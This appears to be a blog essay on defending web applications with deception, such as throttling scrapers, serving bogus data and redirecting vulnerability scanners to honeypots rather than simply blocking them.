A common defensive rule of information security is that once you detect an attack against your organization’s Web applications, you must mitigate the attack by stopping it. In other words: “stop it once you can”.
But what if the rules of the defenders vs. attackers “game” have changed and the teams are not playing in the same league anymore?
For example, here are some of the “game” changers from recent years:
- The playground (aka an attacker’s computing resources) became ridiculously cheap to hire (if not available for free)
- The players of team “black” (also known as attackers) became more persistent, targeted and ruthless
- The players of team “white” (also known as defenders) became overwhelmed by endless amounts of security incidents and are constantly one step behind the attackers
In recent years we have seen an increased number of defenders changing the rules of the “game” and adopting new defensive techniques. Those techniques give the attacker a deceptive feeling that the attack was not detected, reducing the attack effectiveness to the point where it will take too much time and resources to be considered complete.
Maybe the common defensive approach is not good enough; maybe it is time for more defenders to step-up their game and introduce “game” changing rules?
Game Changing Rules
Web applications are constantly being attacked, whether these attacks are by script kiddies, cyber-criminals, or government and military organizations.
Once an attack is detected, the most common defensive approach is to block malicious traffic, or to identify the source of the attack and block all traffic initiated from it.
In order to become persistent, agile and have the upper hand, the attacker may use internet infrastructure and services such as: cloud-hosting providers, mobile networks, open proxies, VPN or even compromised computers (Botnet). These infrastructures and services give the attacker the ability to switch easily between networks and computing resources without having any downtime in attack activity. In addition, by using the “stop it once you can” defensive approach, the defender gives the attacker a better understanding of his security positioning and resilience.
A good example that illustrates the disadvantage of the “stop it once you can” approach can be seen in Web scrapping attacks. For example, if an attacker were to run a web scrapping attack against a products price catalog, the on-going Web scrapping activity may result in the attacker obtaining the most updated price list, leading to a constant competitive advantage. Clearly, a retailer that owns a competitor’s price catalog will have better sales.
A defender that will block traffic initiated from a scrapping computing resource may lead the persistent (and money driven) attacker to switch the scrapping activity to a new computing resource, for example - by easily re-launching new virtual machines on a cloud hosting provider.
In the Web scrapping attack scenario, a game changer approach would be to give the attacker a false sense of success by:
a. Limiting scrapping activity – limiting the scrapping rate to the point where by the time all data was harvested, it becomes out-of-date and irrelevant.
b. Generate bogus scrapping activity – give the attacker bogus and misleading data that won’t provide the desired competitive advantage.
Another good example can also be found when security scanners scan a Web application for vulnerabilities. Once activated, a security scanner will crawl and map all Web application pages and functionalities and try to find if the application is vulnerable to attack vectors such as: SQL Injection, Cross Site Scripting or Remote File Inclusion. Common defensive approaches will use signature based solutions, such as a Web Application Firewall (WAF), in order to block malicious transactions. Once completed, an attacker will have a good perception of the resilience of the targeted Web applications, and will respond to that by finding new attack surface or use other, more elusive attacking techniques.
In the security scan case, a game changer approach would be to still prevent malicious HTTP transactions from hitting the Web server by using a WAF, but at the same time returning bogus responses to the scanners such as:
a. Injecting fake code leakage to Web application responses
b. Redirecting traffic to a Web application honeypot that is not part of the targeted Web application
In this case, the suggested techniques will create overhead for attackers that will lead them to spend more time and resources on analyzing bogus vulnerabilities.
Summary
In the “game” of defenders vs. attackers two ingredients are most important: time and resources. Game changing defensive techniques will enforce attackers to spend more time and resources in order for their attacks to become truly successful. It is time for us, the defenders, to change the rules and to obtain the upper hand.